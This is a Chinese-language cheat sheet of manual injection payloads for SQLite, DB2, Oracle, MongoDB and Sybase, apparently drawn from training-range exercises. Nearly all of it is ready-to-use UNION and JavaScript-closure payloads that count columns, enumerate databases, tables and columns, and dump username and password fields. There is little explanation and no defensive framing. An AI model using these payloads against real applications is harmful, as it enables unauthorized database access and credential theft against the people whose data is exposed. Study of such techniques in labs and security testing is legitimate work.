0x001 SQLite注入
参考:https://www.cnblogs.com/xiaozi/p/5760321.html
通常sqlite文件中会包含一个sqlite_master隐藏表。
这里记录着你建表留下的记录,我们可以查看这个表名来看这些数据
order by 4
union select 1,2,3,4
union select 1,name,sql,4 from sqlite_master
union select 1,name,password,4 from WSTMart_reg
0x002 DB2联合注入
tabschema:数据库名 current schema:数据库名的列名
table_name:表名 tabname:表名的列名
column_name:列名的列名
sysibm.sysdummy1 记录数据库名的信息
syscat.tables:记录表名的信息
sysibm.columns:记录列名的信息
1、猜数
order by 4
union select 1,2,3,4 from sysibm.systables
2、爆库:
union select 1,2,current schema,4 from sysibm.sysdummy1
3、爆表:
union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 0,1
union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 1,1
4、爆列:
union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='GAME_CHARACTER' limit 0,1
5、爆数据:
union select 1,name,password,4 from GAME_CHARACTER limit 0,1
union select 1,name,password,4 from GAME_CHARACTER limit 1,1
0x003 Oracle联合注入
参考:
- https://www.cnblogs.com/peterpan0707007/p/8242119.html
- https://blog.csdn.net/qq_35569814/article/details/100517122
all_tables 查询出所有的表
user_tables 查询出当前用户的表
all_tab_columns 查询出所有的字段
user_tab_columns 查询出当前用户的字段
v$version 查版本
1.查询个数
order by 2
2.查询表名格式
union select null,null from dual
union select 'null',null from dual
union select 'null','null' from dual
3.查询获取表名(筛选,搜索)
union select '1',(select table_name from user_tables where rownum=1) from dual
union select '1',(select table_name from user_tables where rownum=1) from dual
union select '1',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
4.查询获取列名
union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users') from dual
union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name not in 'USER_NAME') from dual
5.获取指定表名列名数据
union select user_name,user_pwd from "sns_users"
union select user_name,user_pwd from "sns_users" where user_name<>'hu'
union select user_name,user_pwd from "sns_users" where user_name='mozhe'
0x004 Mongodb闭合注入
1.获取回显数字
'}); return ({title:1,content:'2
2.爆库
db返回的是数组,库名,需要用tojson转换为字符串
'}); return ({title:tojson(db),content:'2
3.爆表
db.getCollectionNames()返回的是数组,需要用tojson转换为字符串
'}); return ({title:tojson(db.getCollectionNames()),content:'2
4.爆列及数据
db.Authority_confidential是当前用的集合(表),
find函数用于查询,0是第一条数据
'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1
'}); return ({title:tojson(db.Authority_confidential.find()[1]),content:'1
0x005 Sybase手工联合注入
1.猜个数
order by 4
2.猜显位
union all select 'null',null,null,null
union all select null,'null',null,null 显示null证明显示位为2
union all select null,null,'null',null
union all select null,null,null,'null'
3.猜库名
union all select null,db_name(),null,null
union all select null,db_name(1),null,null
union all select null,db_name(2),null,null
4.猜表名
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>'Deepthroat_login'
union all select null,name,null,null from mozhe_Deepthroat.dbo.sysobjects where name<>'Deepthroat_login' and name<>'notice'
5.猜列名
union all select null,name,null,null from mozhe_Deepthroat.dbo.syscolumns where id=object_id('Deepthroat_login')
union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and name<>'id'
union all select null,name,null,null from mozhe_Deepthroat..syscolumns where id=object_id('Deepthroat_login') and name<>'id' and name<>'name'
6.获取数据
union all select null,name,null,null from Deepthroat_login
union all select null,password,null,null from Deepthroat_login
union all select null,password,null,null from Deepthroat_login where name<>'zhang'
union all select null,password,null,null from Deepthroat_login where name='mozhe'